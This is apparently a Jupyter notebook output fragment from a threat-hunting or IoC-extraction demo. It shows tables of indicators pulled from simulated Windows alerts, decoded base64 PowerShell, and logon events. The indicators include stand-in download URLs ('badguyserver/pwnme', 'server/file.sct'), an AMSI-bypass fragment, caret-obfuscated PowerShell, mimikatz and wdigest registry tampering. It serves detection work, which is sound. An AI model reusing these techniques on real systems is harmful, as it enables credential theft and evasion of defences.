21 | \n", "windows_path | \n", "C:\\inetpub\\wwwroot | \n", "13 | \n", "
22 | \n", "windows_path | \n", ".\\cmd | \n", "13 | \n", "
23 | \n", "windows_path | \n", "C:\\inetpub\\wwwroot | \n", "14 | \n", "
24 | \n", "windows_path | \n", ".\\cmd | \n", "14 | \n", "
25 | \n", "windows_path | \n", "\\\\[REDACTED]\\c$\\users\\[REDACTED]\\Documents | \n", "15 | \n", "
26 | \n", "windows_path | \n", ".\\cmd | \n", "15 | \n", "
27 | \n", "windows_path | \n", "C:\\ProgramData | \n", "15 | \n", "
28 | \n", "windows_path | \n", "c:\\windows\\system32\\inetsrv\\appcmd | \n", "16 | \n", "
29 | \n", "windows_path | \n", "C:\\inetpub\\wwwroot | \n", "16 | \n", "
30 | \n", "windows_path | \n", ".\\cmd | \n", "16 | \n", "
31 | \n", "windows_path | \n", "C:\\inetpub\\logs\\logFiles\\W3SVC1 | \n", "17 | \n", "
32 | \n", "windows_path | \n", "C:\\inetpub\\wwwroot | \n", "17 | \n", "
33 | \n", "windows_path | \n", ".\\cmd | \n", "17 | \n", "
34 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\perfc.dat | \n", "18 | \n", "
35 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe | \n", "19 | \n", "
36 | \n", "dns | \n", "doubleextension.pdf.exe | \n", "20 | \n", "
37 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe | \n", "20 | \n", "
38 | \n", "windows_path | \n", "\\C: | \n", "22 | \n", "
39 | \n", "windows_path | \n", "\\Windows\\system32\\conhost.exe | \n", "22 | \n", "
40 | \n", "windows_path | \n", "c:\\testshare | \n", "26 | \n", "
41 | \n", "windows_path | \n", "\\\\MSTICAlertsWin1\\TestShare | \n", "27 | \n", "
42 | \n", "url | \n", "http://server/file.sct | \n", "31 | \n", "
43 | \n", "dns | \n", "server | \n", "31 | \n", "
44 | \n", "windows_path | \n", ".\\regsvr32 | \n", "31 | \n", "
45 | \n", "windows_path | \n", ".\\suchost.exe | \n", "32 | \n", "
46 | \n", "windows_path | \n", ".\\evil.ps1; | \n", "35 | \n", "
47 | \n", "windows_path | \n", ".\\powershell.exe | \n", "35 | \n", "
48 | \n", "windows_path | \n", ".\\powershell | \n", "36 | \n", "
49 | \n", "url | \n", "http://somedomain/best-kitten-names-1.jpg' | \n", "37 | \n", "
50 | \n", "dns | \n", "somedomain | \n", "37 | \n", "
51 | \n", "windows_path | \n", "\\AppData\\Local\\Temp\\kittens1.jpg'; | \n", "37 | \n", "
52 | \n", "windows_path | \n", "C:\\Users\\$env:UserName | \n", "37 | \n", "
53 | \n", "windows_path | \n", ".\\pOWErS^H^ElL^.eX^e^ | \n", "37 | \n", "
54 | \n", "windows_path | \n", ".\\n^e^t | \n", "38 | \n", "
55 | \n", "windows_path | \n", ".\\powershell | \n", "39 | \n", "
56 | \n", "md5_hash | \n", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | \n", "40 | \n", "
57 | \n", "md5_hash | \n", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | \n", "41 | \n", "
58 | \n", "md5_hash | \n", "81ed03caf6901e444c72ac67d192fb9c | \n", "44 | \n", "
59 | \n", "url | \n", "http://badguyserver/pwnme\" | \n", "46 | \n", "
60 | \n", "dns | \n", "badguyserver | \n", "46 | \n", "
61 | \n", "url | \n", "http://badguyserver/pwnme\" | \n", "47 | \n", "
62 | \n", "dns | \n", "badguyserver | \n", "47 | \n", "
63 | \n", "windows_path | \n", ".\\powershell | \n", "47 | \n", "
64 | \n", "windows_path | \n", ".\\powershell | \n", "48 | \n", "
65 | \n", "windows_path | \n", ".\\powershell | \n", "49 | \n", "
66 | \n", "windows_path | \n", ".\\powershell | \n", "50 | \n", "
67 | \n", "windows_path | \n", ".\\rUnDlL32 | \n", "58 | \n", "
68 | \n", "windows_path | \n", ".\\reg query add mscfile\\\\\\\\open | \n", "59 | \n", "
69 | \n", "windows_path | \n", ".\\reg | \n", "60 | \n", "
70 | \n", "windows_path | \n", ".\\dubrute.exe | \n", "61 | \n", "
71 | \n", "windows_path | \n", ".\\nlbrute.exe | \n", "62 | \n", "
72 | \n", "windows_path | \n", ".\\reg | \n", "63 | \n", "
73 | \n", "windows_path | \n", "\\system\\CurrentControlSet\\Control\\Terminal | \n", "63 | \n", "
74 | \n", "windows_path | \n", ".\\reg | \n", "64 | \n", "
75 | \n", "windows_path | \n", "\\system\\CurrentControlSet\\Control\\Terminal | \n", "64 | \n", "
76 | \n", "windows_path | \n", "\\\\tsclient\\c | \n", "65 | \n", "
77 | \n", "windows_path | \n", "\\Microsoft\\Windows\\CurrentVersion Certificate).Certificate);.\\powershell | \n", "67 | \n", "
78 | \n", "windows_path | \n", ".\\powershell.exe | \n", "67 | \n", "
79 | \n", "windows_path | \n", "C:\\Windows\\System32\\mshta.exe | \n", "67 | \n", "
80 | \n", "windows_path | \n", "c:\\users\\Bob\\appdata\\Roaming\\RbtGskQ\\RbtGskQ.exe | \n", "68 | \n", "
81 | \n", "windows_path | \n", ".\\netsh | \n", "68 | \n", "
82 | \n", "windows_path | \n", ".\\reg add HKLM\\KEY_LOCAL_MACHINE\\...securityproviders\\wdigest | \n", "69 | \n", "
83 | \n", "windows_path | \n", "c:\\Windows\\System32\\cmd.exe | \n", "70 | \n", "
84 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\scrsave.scr | \n", "71 | \n", "
85 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\svchost.exe | \n", "72 | \n", "
86 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\smss.exe | \n", "73 | \n", "
87 | \n", "windows_path | \n", "c:\\Windows\\System32\\svchost.exe | \n", "74 | \n", "
88 | \n", "dns | \n", "system.management.automation.amsiutils | \n", "77 | \n", "
89 | \n", "dns | \n", "system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | \n", "77 | \n", "
90 | \n", "url | \n", "http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | \n", "77 | \n", "
91 | \n", "windows_path | \n", ".\\powershell.exe | \n", "77 | \n", "
92 | \n", "ipv4 | \n", "1.2.3.4 | \n", "78 | \n", "
93 | \n", "windows_path | \n", "C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt | \n", "78 | \n", "
94 | \n", "windows_path | \n", ".\\wuauclt.exe | \n", "79 | \n", "
95 | \n", "windows_path | \n", "c:\\windows\\softwaredistribution\\cscript.exe | \n", "79 | \n", "
96 | \n", "windows_path | \n", "c:\\windows\\softwaredistribution\\cscript.exe | \n", "80 | \n", "
97 | \n", "windows_path | \n", ".\\lsass.exe | \n", "80 | \n", "
98 | \n", "windows_path | \n", "c:\\windows\\system32\\wscript.exe | \n", "82 | \n", "
99 | \n", "windows_path | \n", "c:\\windows\\system32\\inetsrv\\appcmd | \n", "83 | \n", "
100 | \n", "windows_path | \n", "C:\\inetpub\\wwwroot | \n", "83 | \n", "
101 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\2840.exe | \n", "84 | \n", "
102 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\a_keygen.exe | \n", "85 | \n", "
103 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\bittorrent.exe | \n", "87 | \n", "
104 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\netsh.exe | \n", "88 | \n", "
105 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp\\ransomware.exe | \n", "90 | \n", "
106 | \n", "windows_path | \n", "\\\\server\\payload.dll | \n", "92 | \n", "
107 | \n", "windows_path | \n", "C:\\Users\\Administrator\\AppData\\Roaming\\{RANDOM}.txt | \n", "94 | \n", "
108 | \n", "ipv4 | \n", "127.0.0.1 | \n", "102 | \n", "
109 | \n", "url | \n", "http://127.0.0.1/ | \n", "102 | \n", "
110 | \n", "windows_path | \n", ".\\reg | \n", "103 | \n", "
111 | \n", "windows_path | \n", "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\\MyNastySvcHostConfig | \n", "103 | \n", "
112 | \n", "windows_path | \n", ".\\reg | \n", "104 | \n", "
113 | \n", "windows_path | \n", "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\\MyNastySvcHostConfig | \n", "104 | \n", "
114 | \n", "windows_path | \n", "C:\\Users\\MSTICA~1\\AppData\\Local\\Temp\\hd.exe | \n", "105 | \n", "
115 | \n", "windows_path | \n", "\\\\.\\pipe\\blahtest | \n", "107 | \n", "
116 | \n", "windows_path | \n", ".\\reg.exe | \n", "108 | \n", "
117 | \n", "windows_path | \n", "\\console | \n", "108 | \n", "
118 | \n", "windows_path | \n", "c:\\windows\\fonts\\csrss.exe | \n", "109 | \n", "
119 | \n", "windows_path | \n", "c:\\windows\\fonts\\conhost.exe | \n", "110 | \n", "
120 | \n", "windows_path | \n", ".\\mimikatz.exe | \n", "111 | \n", "
121 | \n", "windows_path | \n", ".\\rundll32.exe | \n", "112 | \n", "
122 | \n", "windows_path | \n", "c:\\windows\\fonts\\conhost.exe | \n", "112 | \n", "
123 | \n", "windows_path | \n", "c:\\windows\\fonts\\csrss.exe | \n", "113 | \n", "
124 | \n", "windows_path | \n", ".\\regsvr32 | \n", "113 | \n", "
125 | \n", "windows_path | \n", "c:\\Diagnostics\\UserTmp | \n", "115 | \n", "
126 | \n", "windows_path | \n", "c:\\Diagnostics\\WindowsSimulateDetections.bat | \n", "115 | \n", "
127 | \n", "windows_path | \n", "C:\\Windows\\System32\\win32calc.exe | \n", "116 | \n", "
\n", " | full_decoded_string | \n", "original_string | \n", "decoded_string | \n", "input_bytes | \n", "file_hashes | \n", "
---|---|---|---|---|---|
0 | \n", ".\\powershell -enc <decoded type='string' name='[None]' index='1' depth='1'>$\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000... | \n", "JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8A... | \n", "$\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000;\u0000\\r\u0000\\n\u0000&\u0000 \u0000(\u0000'\u0000I\u0000n\u0000v\u0000o\u0000k\u0000e\u0000'\u0000+\u0000'\u0000-\u0000E\u0000x\u0000p\u0000r\u0000e\u0000s\u0000s\u0000i\u0000o\u0000n\u0000'\u0000)\u0000 \u0000$\u0000t\u0000 | \n", "b\"$\\x00t\\x00 \\x00=\\x00 \\x00'\\x00d\\x00i\\x00r\\x00'\\x00;\\x00\\r\\x00\\n\\x00&\\x00 \\x00(\\x00'\\x00I\\x00n\\... | \n", "{'md5': '6cd1486db221e532cc2011c9beeb4ffc', 'sha1': '6e485467d7e06502046b7c84a8ef067cfe1512ad', ... | \n", "
1 | \n", "cmd /c \"echo # <decoded type='string' name='[None]' index='1' depth='1'>ꙩ榚骦ꙩ榚骦ꙩ榚骦ꙩ榚骦</decoded> ... | \n", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | \n", "ꙩ榚骦ꙩ榚骦ꙩ榚骦ꙩ榚骦 | \n", "b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9a' | \n", "{'md5': '9a45b2520e930dc9186f6d93a7798a13', 'sha1': 'f526c90fa0744e3a63d84421ff25e3f5a3d697cb', ... | \n", "
2 | \n", "cmd /c \"echo # <decoded type='string' name='[None]' index='1' depth='1'>ꙩ榚骦ꙩ榚骦ꙩ榚骦ꙩ榚骦</decoded> ... | \n", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | \n", "ꙩ榚骦ꙩ榚骦ꙩ榚骦ꙩ榚骦 | \n", "b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9a' | \n", "{'md5': '9a45b2520e930dc9186f6d93a7798a13', 'sha1': 'f526c90fa0744e3a63d84421ff25e3f5a3d697cb', ... | \n", "
3 | \n", "implant.exe <decoded type='string' name='[None]' index='1' depth='1'>埳펝᩷꽿해㣮컡槶믎彷絶岿</decoded> | \n", "81ed03caf6901e444c72ac67d192fb9c | \n", "埳펝᩷꽿해㣮컡槶믎彷絶岿 | \n", "b'\\xf3W\\x9d\\xd3w\\x1a\\x7f\\xaft\\xd5\\xee8\\xe1\\xce\\xf6i\\xce\\xbbw_v}\\xbf\\\\' | \n", "{'md5': '1c8cc6299bd654bbcd85710968d6a87c', 'sha1': '55377391141f59a2ff5ae4765d9f0b4438adfd73', ... | \n", "
\n", " | IoCType | \n", "Observable | \n", "SourceIndex | \n", "
---|---|---|---|
0 | \n", "windows_path | \n", ".\\powershell | \n", "0 | \n", "
\n", " | TenantId | \n", "Account | \n", "EventID | \n", "TimeGenerated | \n", "SourceComputerId | \n", "Computer | \n", "SubjectUserName | \n", "SubjectDomainName | \n", "SubjectUserSid | \n", "TargetUserName | \n", "TargetDomainName | \n", "TargetUserSid | \n", "TargetLogonId | \n", "LogonProcessName | \n", "LogonType | \n", "AuthenticationPackageName | \n", "Status | \n", "IpAddress | \n", "WorkstationName | \n", "AccountNum | \n", "LogonHour | \n", "Clustered | \n", "ClusterId | \n", "ClusterSize | \n", "LastEventTime | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "MSTICAlertsWin1\\MSTICAdmin | \n", "4624 | \n", "2019-01-15 05:15:02.980 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "S-1-5-18 | \n", "MSTICAdmin | \n", "MSTICAlertsWin1 | \n", "S-1-5-21-996632719-2361334927-4038480536-500 | \n", "0xfaac27 | \n", "Advapi | \n", "4 | \n", "Negotiate | \n", "\n", " | - | \n", "MSTICAlertsWin1 | \n", "2319 | \n", "5 | \n", "True | \n", "0.0 | \n", "2.0 | \n", "2019-01-15 04:28:33.090 | \n", "
1 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "NT AUTHORITY\\SYSTEM | \n", "4624 | \n", "2019-01-15 05:15:04.503 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "S-1-5-18 | \n", "SYSTEM | \n", "NT AUTHORITY | \n", "S-1-5-18 | \n", "0x3e7 | \n", "Advapi | \n", "5 | \n", "Negotiate | \n", "\n", " | - | \n", "- | \n", "1484 | \n", "5 | \n", "True | \n", "1.0 | \n", "11.0 | \n", "2019-01-15 03:09:51.707 | \n", "
2 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "MSTICAlertsWin1\\adm1nistrator | \n", "4624 | \n", "2019-01-15 05:15:06.363 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "- | \n", "- | \n", "S-1-0-0 | \n", "adm1nistrator | \n", "MSTICAlertsWin1 | \n", "S-1-5-21-996632719-2361334927-4038480536-1066 | \n", "0xfb5ee6 | \n", "NtLmSsp | \n", "3 | \n", "NTLM | \n", "\n", " | fe80::38dc:e4a9:61bd:b458 | \n", "MSTICAlertsWin1 | \n", "2799 | \n", "5 | \n", "False | \n", "-1.0 | \n", "1.0 | \n", "2019-01-15 05:15:06.363 | \n", "
\\n\"+\n", " \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n", " \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n", " \"
\\n\"+\n", " \"\\n\"+\n",
" \"from bokeh.resources import INLINE\\n\"+\n",
" \"output_notebook(resources=INLINE)\\n\"+\n",
" \"
\\n\"+\n",
" \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n", " \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n", " \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n", " \"
\\n\"+\n", " \"\\n\"+\n",
" \"from bokeh.resources import INLINE\\n\"+\n",
" \"output_notebook(resources=INLINE)\\n\"+\n",
" \"
\\n\"+\n",
" \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n", " \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n", " \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n", " \"
\\n\"+\n", " \"\\n\"+\n",
" \"from bokeh.resources import INLINE\\n\"+\n",
" \"output_notebook(resources=INLINE)\\n\"+\n",
" \"
\\n\"+\n",
" \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\n", " | \n", " | TimeGenerated | \n", "
---|---|---|
Account | \n", "LogonType | \n", "\n", " |
MSTICAlertsWin1\\MSTICAdmin | \n", "4 | \n", "2 | \n", "
MSTICAlertsWin1\\adm1nistrator | \n", "3 | \n", "1 | \n", "
NT AUTHORITY\\SYSTEM | \n", "5 | \n", "11 | \n", "
\n", " | TenantId | \n", "Account | \n", "EventID | \n", "TimeGenerated | \n", "SourceComputerId | \n", "Computer | \n", "SubjectUserName | \n", "SubjectDomainName | \n", "SubjectUserSid | \n", "TargetUserName | \n", "TargetDomainName | \n", "TargetUserSid | \n", "TargetLogonId | \n", "LogonProcessName | \n", "LogonType | \n", "AuthenticationPackageName | \n", "Status | \n", "IpAddress | \n", "WorkstationName | \n", "
---|